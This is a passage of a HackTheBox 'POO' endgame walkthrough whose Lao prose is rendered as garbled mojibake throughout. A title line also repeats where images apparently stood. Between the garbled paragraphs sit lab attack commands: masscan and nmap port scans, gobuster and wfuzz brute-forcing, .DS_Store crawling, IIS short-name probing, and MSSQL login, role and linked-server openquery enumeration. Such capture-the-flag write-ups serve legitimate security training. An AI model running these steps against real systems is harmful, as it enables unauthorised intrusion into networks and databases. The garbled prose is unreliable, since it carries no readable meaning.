HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบ™เบšเบปเบ”เบ„เบงเบฒเบกเบ™เบตเป‰เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเบงเบดเป€เบ„เบฒเบฐ passage เบ‚เบญเบ‡เบšเปเปˆเบžเบฝเบ‡เปเบ•เปˆเป€เบ„เบทเปˆเบญเบ‡เบˆเบฑเบ, เปเบ•เปˆเป€เบ›เบฑเบ™เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡ mini เบ—เบฑเบ‡เบซเบกเบปเบ”เบˆเบฒเบเบชเบฐเบ–เบฒเบ™เบ—เบตเปˆ HackTheBox.

เบ”เบฑเปˆเบ‡เบ—เบตเปˆเป„เบ”เป‰เบเปˆเบฒเบงเป„เบงเป‰เปƒเบ™เบ„เปเบฒเบญเบฐเบ—เบดเบšเบฒเบ, POO เบ–เบทเบเบญเบญเบเปเบšเบšเบกเบฒเป€เบžเบทเปˆเบญเบ—เบปเบ”เบชเบญเบšเบ—เบฑเบเบชเบฐเปƒเบ™เบ—เบธเบเบ‚เบฑเป‰เบ™เบ•เบญเบ™เบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เบชเบฐเบžเบฒเบšเปเบงเบ”เบฅเป‰เบญเบก Active Directory เบ‚เบฐเบซเบ™เบฒเบ”เบ™เป‰เบญเบ. เป€เบ›เบปเป‰เบฒเบซเบกเบฒเบเปเบกเปˆเบ™เป€เบžเบทเปˆเบญเบ›เบฐเบ™เบตเบ›เบฐเบ™เบญเบกเป€เบ›เบฑเบ™เป€เบˆเบปเป‰เบฒเบžเบฒเบšเบ—เบตเปˆเบชเบฒเบกเบฒเบ”เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป„เบ”เป‰, เบ‚เบฐเบซเบเบฒเบเบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”, เปเบฅเบฐเบชเบธเบ”เบ—เป‰เบฒเบเบ›เบฐเบ™เบตเบ›เบฐเบ™เบญเบกเป‚เบ”เป€เบกเบ™เบ—เบฑเบ‡เบซเบกเบปเบ”เปƒเบ™เบ‚เบฐเบ™เบฐเบ—เบตเปˆเป€เบเบฑเบšเบเปเบฒ 5 เบ—เบธเบ‡.

เบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบšเบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เปเบกเปˆเบ™เบœเปˆเบฒเบ™ VPN. เบกเบฑเบ™เปเบ™เบฐเบ™เปเบฒเปƒเบซเป‰เบšเปเปˆเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบˆเบฒเบเบ„เบญเบกเบžเบดเบงเป€เบ•เบตเบšเปˆเบญเบ™เป€เบฎเบฑเบ”เบงเบฝเบเบซเบผเบทเบˆเบฒเบเป€เบˆเบปเป‰เบฒเบžเบฒเบšเบšเปˆเบญเบ™เบ—เบตเปˆเบกเบตเบ‚เปเป‰เบกเบนเบ™เบ—เบตเปˆเบชเปเบฒเบ„เบฑเบ™เบชเปเบฒเบฅเบฑเบšเบ—เปˆเบฒเบ™, เบ™เบฑเบšเบ•เบฑเป‰เบ‡เปเบ•เปˆเบ—เปˆเบฒเบ™เบชเบดเป‰เบ™เบชเบธเบ”เบฅเบปเบ‡เปƒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบเบชเปˆเบงเบ™เบ•เบปเบงเบเบฑเบšเบœเบนเป‰เบ—เบตเปˆเบฎเบนเป‰เบšเบฒเบ‡เบชเบดเปˆเบ‡เบšเบฒเบ‡เบขเปˆเบฒเบ‡เปƒเบ™เบ”เป‰เบฒเบ™เบ„เบงเบฒเบกเบ›เบญเบ”เป„เบžเบ‚เบญเบ‡เบ‚เปเป‰เบกเบนเบ™ :)

เบ‚เปเป‰เบกเบนเบ™เบญเบปเบ‡เบเบฒเบ™เบˆเบฑเบ”เบ•เบฑเป‰เบ‡
เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™, เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เบŠเบญเบเบซเบฒเบšเบปเบ”เบ„เบงเบฒเบกเปƒเบซเบกเปˆ, เบŠเบญเบšเปเบงเปเบฅเบฐเบ‚เปเป‰เบกเบนเบ™เบญเบทเปˆเบ™เป†, เบ‚เป‰เบฒเบžเบฐเป€เบˆเบปเป‰เบฒเป„เบ”เป‰เบชเป‰เบฒเบ‡ เบŠเปˆเบญเบ‡เบ—เบฒเบ‡ Telegram ะธ เบเบธเปˆเบกโ€‹เป€เบžเบทเปˆเบญโ€‹เบ›เบถเบโ€‹เบชเบฒโ€‹เบซเบฒโ€‹เบฅเบทโ€‹เบšเบฑเบ™โ€‹เบซเบฒโ€‹เปƒเบ”โ€‹เบซเบ™เบถเปˆเบ‡โ€‹ เปƒเบ™เป€เบ‚เบ”เบžเบทเป‰เบ™เบ—เบตเปˆเบ‚เบญเบ‡ IIKB. เบ™เบญเบเบˆเบฒเบเบ™เบฑเป‰เบ™, เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเบชเปˆเบงเบ™เบšเบธเบเบ„เบปเบ™, เบ„เปเบฒเบ–เบฒเบก, เบ„เปเบฒเปเบ™เบฐเบ™เปเบฒเปเบฅเบฐเบ„เปเบฒเปเบ™เบฐเบ™เปเบฒเบ‚เบญเบ‡เบ—เปˆเบฒเบ™ เบ‚เป‰เบฒโ€‹เบžเบฐโ€‹เป€เบˆเบปเป‰เบฒโ€‹เบˆเบฐโ€‹เป€เบšเบดเปˆเบ‡โ€‹เป€เบ›เบฑเบ™โ€‹เบชเปˆเบงเบ™โ€‹เบšเบธเบโ€‹เบ„เบปเบ™โ€‹เปเบฅเบฐโ€‹เบ•เบญเบšโ€‹เบชเบฐโ€‹เบซเบ™เบญเบ‡โ€‹เบเบฑเบšโ€‹เบ—เบธเบโ€‹เบ„เบปเบ™โ€‹..

เบ‚เปเป‰เบกเบนเบ™เบ—เบฑเบ‡เบซเบกเบปเบ”เปเบกเปˆเบ™เบ™เปเบฒเบชเบฐเป€เบซเบ™เบตเบชเปเบฒเบฅเบฑเบšเบˆเบธเบ”เบ›เบฐเบชเบปเบ‡เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ—เบปเปˆเบฒเบ™เบฑเป‰เบ™. เบœเบนเป‰เบ‚เบฝเบ™เป€เบญเบเบฐเบชเบฒเบ™เบชเบฐเบšเบฑเบšเบ™เบตเป‰เบšเปเปˆเบเบญเบกเบฎเบฑเบšเบ„เบงเบฒเบกเบฎเบฑเบšเบœเบดเบ”เบŠเบญเบšเบ•เปเปˆเบ„เบงเบฒเบกเป€เบชเบเบซเบฒเบเบ—เบตเปˆเป€เบเบตเบ”เบˆเบฒเบเบœเบนเป‰เปƒเบ”เบเปเปˆเบ•เบฒเบกเบ—เบตเปˆเป€เบ›เบฑเบ™เบœเบปเบ™เบกเบฒเบˆเบฒเบเบเบฒเบ™เบ™เปเบฒเปƒเบŠเป‰เบ„เบงเบฒเบกเบฎเบนเป‰เปเบฅเบฐเป€เบ•เบฑเบเบ™เบดเบเบ—เบตเปˆเป„เบ”เป‰เบฎเบฑเบšเบˆเบฒเบเบเบฒเบ™เบชเบถเบเบชเบฒเป€เบญเบเบฐเบชเบฒเบ™เบ™เบตเป‰.

Intro

เป€เบเบกเบชเบธเบ”เบ—เป‰เบฒเบเบ™เบตเป‰เบ›เบฐเบเบญเบšเบ”เป‰เบงเบเบชเบญเบ‡เป€เบ„เบทเปˆเบญเบ‡เบˆเบฑเบ, เปเบฅเบฐเบกเบต 5 เบ—เบธเบ‡.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบฅเบฒเบเบฅเบฐเบญเบฝเบ” เปเบฅเบฐเบ—เบตเปˆเบขเบนเปˆเบ‚เบญเบ‡เป€เบˆเบปเป‰เบฒเบžเบฒเบšเบ—เบตเปˆเบกเบตเบขเบนเปˆเปเบกเปˆเบ™เปƒเบซเป‰.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบซเป‰เป€เบฅเบตเปˆเบกเบ•เบปเป‰เบ™!

เบ—เบธเบ‡ Recon

เป€เบ„เบทเปˆเบญเบ‡เบ™เบตเป‰เบกเบตเบ—เบตเปˆเบขเบนเปˆ IP เบ‚เบญเบ‡ 10.13.38.11, เบ—เบตเปˆเบ‚เป‰เบญเบเป€เบžเบตเปˆเบกเปƒเบชเปˆ /etc/hosts.
10.13.38.11 poo.htb

เบเปˆเบญเบ™เบญเบทเปˆเบ™ เปเบปเบ”, เบžเบงเบเป€เบฎเบปเบฒเบชเบฐเปเบเบ™เบžเบญเบ”เป€เบ›เบตเบ”. เบ™เบฑเบšเบ•เบฑเป‰เบ‡เปเบ•เปˆเบเบฒเบ™เบชเบฐเปเบเบ™เบžเบญเบ”เบ—เบฑเบ‡เบซเบกเบปเบ”เบ”เป‰เบงเบ nmap เปƒเบŠเป‰เป€เบงเบฅเบฒเบ”เบปเบ™, เบ—เปเบฒเบญเบดเบ”เบ‚เป‰เบญเบเบˆเบฐเป€เบฎเบฑเบ”เบชเบดเปˆเบ‡เบ™เบตเป‰เป‚เบ”เบเปƒเบŠเป‰ masscan. เบžเบงเบเป€เบฎเบปเบฒเบชเบฐเปเบเบ™เบ—เบธเบเบžเบญเบ” TCP เปเบฅเบฐ UDP เบˆเบฒเบเบเบฒเบ™เป‚เบ•เป‰เบ•เบญเบš tun0 เบ”เป‰เบงเบเบ„เบงเบฒเบกเป„เบง 500 เปเบžเบฑเบเป€เบเบฑเบ”เบ•เปเปˆเบงเบดเบ™เบฒเบ—เบต.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบ™เบ›เบฑเบ”เบˆเบธเบšเบฑเบ™, เป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบ”เป‰เบฎเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบฅเบฒเบเบฅเบฐเบญเบฝเบ”เป€เบžเบตเปˆเบกเป€เบ•เบตเบกเบเปˆเบฝเบงเบเบฑเบšเบเบฒเบ™เบšเปเบฅเบดเบเบฒเบ™เบ—เบตเปˆเบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™เบขเบนเปˆเปƒเบ™เบžเบญเบ”, เปƒเบซเป‰เบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™เบชเบฐเปเบเบ™เบ”เป‰เบงเบเบ—เบฒเบ‡เป€เบฅเบทเบญเบ -A.

nmap -A poo.htb -p80,1433

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™, เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบšเปเบฅเบดเบเบฒเบ™ IIS เปเบฅเบฐ MSSQL. เปƒเบ™เบเปเบฅเบฐเบ™เบตเบ™เบตเป‰, เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเบŠเบญเบเบซเบฒเบŠเบทเปˆ DNS เบ—เบตเปˆเปเบ—เป‰เบˆเบดเบ‡เบ‚เบญเบ‡เป‚เบ”เป€เบกเบ™เปเบฅเบฐเบ„เบญเบกเบžเบดเบงเป€เบ•เบต. เปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเป€เบงเบฑเบšเป„เบŠเบ•เปŒ, เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เบ•เป‰เบญเบ™เบฎเบฑเบšเป‚เบ”เบเบซเบ™เป‰เบฒเบ—เปเบฒเบญเบดเบ”เบ‚เบญเบ‡ IIS.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปƒเบซเป‰เป„เบ›เป‚เบ”เบเบœเปˆเบฒเบ™เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต. เบ‚เป‰เบญเบเปƒเบŠเป‰ gobuster เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ™เบตเป‰. เปƒเบ™เบžเบฒเบฅเบฒเบกเบดเป€เบ•เบตเบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบŠเบตเป‰เบšเบญเบเบˆเปเบฒเบ™เบงเบ™เบ‚เบญเบ‡เบเบฐเบ—เบนเป‰ 128 (-t), URL (-u), เบงเบฑเบ”เบˆเบฐเบ™เบฒเบ™เบธเบเบปเบก (-w) เปเบฅเบฐเบชเปˆเบงเบ™เบ‚เบฐเบซเบเบฒเบเบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบชเบปเบ™เปƒเบˆ (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ™เบตเป‰เป€เบฎเบฑเบ”เปƒเบซเป‰เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบเบฒเบ™เบเบงเบ”เบชเบญเบš HTTP เบชเปเบฒเบฅเบฑเบšเป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต /admin, เป€เบŠเบฑเปˆเบ™เบ”เบฝเบงเบเบฑเบ™เบเบฑเบšเบšเปเบฅเบดเบเบฒเบ™ desktop เบ—เบตเปˆเบชเบฒเบกเบฒเบ”เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป„เบŸเบฅเปŒ .DS_Store. .DS_Store เปเบกเปˆเบ™เป„เบŸเบฅเปŒเบ—เบตเปˆเป€เบเบฑเบšเบฎเบฑเบเบชเบฒเบเบฒเบ™เบ•เบฑเป‰เบ‡เบ„เปˆเบฒเปเบšเบšเบเบณเบ™เบปเบ”เป€เบญเบ‡เบชเบณเบฅเบฑเบšเป‚เบŸเบ™เป€เบ”เบต เป€เบŠเบฑเปˆเบ™: เบฅเบฒเบเบŠเบทเปˆเป„เบŸเบฅเปŒ, เบชเบฐเบ–เบฒเบ™เบ—เบตเปˆเป„เบญเบ„เบญเบ™ เปเบฅเบฐเบฎเบนเบšเบžเบทเป‰เบ™เบซเบผเบฑเบ‡เบ—เบตเปˆเป€เบฅเบทเบญเบ. เป„เบŸเบฅเปŒเบ”เบฑเปˆเบ‡เบเปˆเบฒเบงเบญเบฒเบ”เบˆเบฐเบชเบดเป‰เบ™เบชเบธเบ”เบขเบนเปˆเปƒเบ™เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบ‚เบญเบ‡เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเป€เบงเบฑเบšเป„เบŠเบ•เปŒเบ‚เบญเบ‡เบœเบนเป‰เบžเบฑเบ”เบ—เบฐเบ™เบฒเป€เบงเบฑเบš. เบ”เป‰เบงเบเบงเบดเบ—เบตเบ™เบตเป‰, เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบฎเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบเปˆเบฝเบงเบเบฑเบšเป€เบ™เบทเป‰เบญเปƒเบ™เบ‚เบญเบ‡เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต. เป€เบžเบทเปˆเบญเป€เบฎเบฑเบ”เบชเบดเปˆเบ‡เบ™เบตเป‰, เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เบ™เปเบฒเปƒเบŠเป‰ เบ•เบปเบงเบเบงเบฒเบ”เป€เบงเบฑเบš DS_Store.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เบฎเบฑเบšเป€เบ™เบทเป‰เบญเปƒเบ™เบ‚เบญเบ‡เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต. เบชเบดเปˆเบ‡เบ—เบตเปˆเบซเบ™เป‰เบฒเบชเบปเบ™เปƒเบˆเบ—เบตเปˆเบชเบธเบ”เบขเบนเปˆเบ—เบตเปˆเบ™เบตเป‰เปเบกเปˆเบ™เป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต / dev, เบˆเบฒเบเบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบชเบฒเบกเบฒเบ”เป€เบšเบดเปˆเบ‡เปเบซเบผเปˆเบ‡เปเบฅเบฐเป„เบŸเบฅเปŒ db เปƒเบ™เบชเบญเบ‡เบชเบฒเบ‚เบฒ. เปเบ•เปˆเบžเบงเบเป€เบฎเบปเบฒเบชเบฒเบกเบฒเบ”เบ™เปเบฒเปƒเบŠเป‰ 6 เบ•เบปเบงเบญเบฑเบเบชเบญเบ™เบ—เปเบฒเบญเบดเบ”เบ‚เบญเบ‡เบŠเบทเปˆเป„เบŸเบฅเปŒเปเบฅเบฐเป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบ–เป‰เบฒเบšเปเบฅเบดเบเบฒเบ™เบกเบตเบ„เบงเบฒเบกเบชเปˆเบฝเบ‡เบ•เปเปˆ IIS ShortName. เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เบเบงเบ”เบชเบญเบšเบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเบ™เบตเป‰เป‚เบ”เบเปƒเบŠเป‰ เป€เบ„เบทเปˆเบญเบ‡เบชเบฐเปเบเบ™เบŠเบทเปˆเบซเบเปเป‰ IIS.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเบŠเบญเบเบซเบฒเป„เบŸเบฅเปŒเบ‚เปเป‰เบ„เบงเบฒเบกเบซเบ™เบถเปˆเบ‡เบ—เบตเปˆเป€เบฅเบตเปˆเบกเบ•เบปเป‰เบ™เบ”เป‰เบงเบ "poo_co". เบšเปเปˆเบฎเบนเป‰เบงเปˆเบฒเบˆเบฐเป€เบฎเบฑเบ”เปเบ™เบงเปƒเบ”เบ•เปเปˆเป„เบ›, เบ‚เป‰เบฒเบžเบฐเป€เบˆเบปเป‰เบฒเบžเบฝเบ‡เปเบ•เปˆเป€เบฅเบทเบญเบเบ„เปเบฒเบ—เบฑเบ‡เบซเบกเบปเบ”เบ—เบตเปˆเป€เบฅเบตเปˆเบกเบ•เบปเป‰เบ™เบ”เป‰เบงเบ "co" เบˆเบฒเบเบงเบฑเบ”เบˆเบฐเบ™เบฒเบ™เบธเบเบปเบก.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

เปเบฅเบฐเป€เบฎเบฑเบ”เบŠเป‰เบณเบเบฑเบš wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเบŠเบญเบเบซเบฒเบ„เปเบฒเบ—เบตเปˆเบ–เบทเบเบ•เป‰เบญเบ‡! เบžเบงเบเป€เบฎเบปเบฒเป€เบšเบดเปˆเบ‡เป„เบŸเบฅเปŒเบ™เบตเป‰, เบšเบฑเบ™เบ—เบถเบเบ‚เปเป‰เบกเบนเบ™เบ›เบฐเบˆเปเบฒเบ•เบปเบง (เบเบฒเบ™เบ•เบฑเบ”เบชเบดเบ™เป‚เบ”เบเบžเบฒเบฅเบฒเบกเบดเป€เบ•เบต DBNAME, เบžเบงเบเป€เบ‚เบปเบฒเบกเบฒเบˆเบฒเบ MSSQL).

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบเบญเบกเบˆเปเบฒเบ™เบปเบ™เบ—เบธเบ‡เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเบเป‰เบฒเบงเบซเบ™เป‰เบฒ 20%.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ—เบธเบ‡

เบžเบงเบเป€เบฎเบปเบฒเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบš MSSQL, เบ‚เป‰เบญเบเปƒเบŠเป‰ DBeaver.

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบšเปเปˆเบžเบปเบšเบชเบดเปˆเบ‡เบ—เบตเปˆเบซเบ™เป‰เบฒเบชเบปเบ™เปƒเบˆเปƒเบ™เบ–เบฒเบ™เบ‚เปเป‰เบกเบนเบ™เบ™เบตเป‰, เปƒเบซเป‰เบžเบงเบเป€เบฎเบปเบฒเบชเป‰เบฒเบ‡ SQL Editor เปเบฅเบฐเบเบงเบ”เป€เบšเบดเปˆเบ‡เบงเปˆเบฒเบœเบนเป‰เปƒเบŠเป‰เบกเบตเบซเบเบฑเบ‡เปเบ”เปˆ.

SELECT name FROM master..syslogins;

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบœเบนเป‰เปƒเบŠเป‰เบชเบญเบ‡เบ„เบปเบ™. เปƒเบซเป‰เบเบงเบ”เป€เบšเบดเปˆเบ‡เบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒ.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™, เบšเปเปˆเบกเบตเบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”. เปƒเบซเป‰เป€เบšเบดเปˆเบ‡เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ—เบตเปˆเป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ, เบ‚เป‰เบฒเบžเบฐเป€เบˆเบปเป‰เบฒเป„เบ”เป‰เบ‚เบฝเบ™เบเปˆเบฝเบงเบเบฑเบšเป€เบ•เบฑเบเบ™เบดเบเบ™เบตเป‰เบขเปˆเบฒเบ‡เบฅเบฐเบญเบฝเบ” เบ—เบตเปˆเบ™เบตเป‰.

SELECT * FROM master..sysservers;

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เบ™เบตเป‰เปเบกเปˆเบ™เบงเบดเบ—เบตเบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบŠเบญเบเบซเบฒ SQL Server เบญเบทเปˆเบ™. เปƒเบซเป‰เบ—เบปเบ”เบชเบญเบšเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ™เบตเป‰เป‚เบ”เบเปƒเบŠเป‰ openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgame. Passage เบ‚เบญเบ‡เบซเป‰เบญเบ‡เบ—เบปเบ”เบฅเบญเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เบเบฐเบ—เปเบฒเบœเบดเบ”เป€เบ›เบฑเบ™เบกเบทเบญเบฒเบŠเบตเบš. Pentest Active Directory

เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเบเบฑเบ‡เบชเบฒเบกเบฒเบ”เบชเป‰เบฒเบ‡เบ•เบปเป‰เบ™เป„เบกเป‰เบชเบญเบšเบ–เบฒเบกเป„เบ”เป‰.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

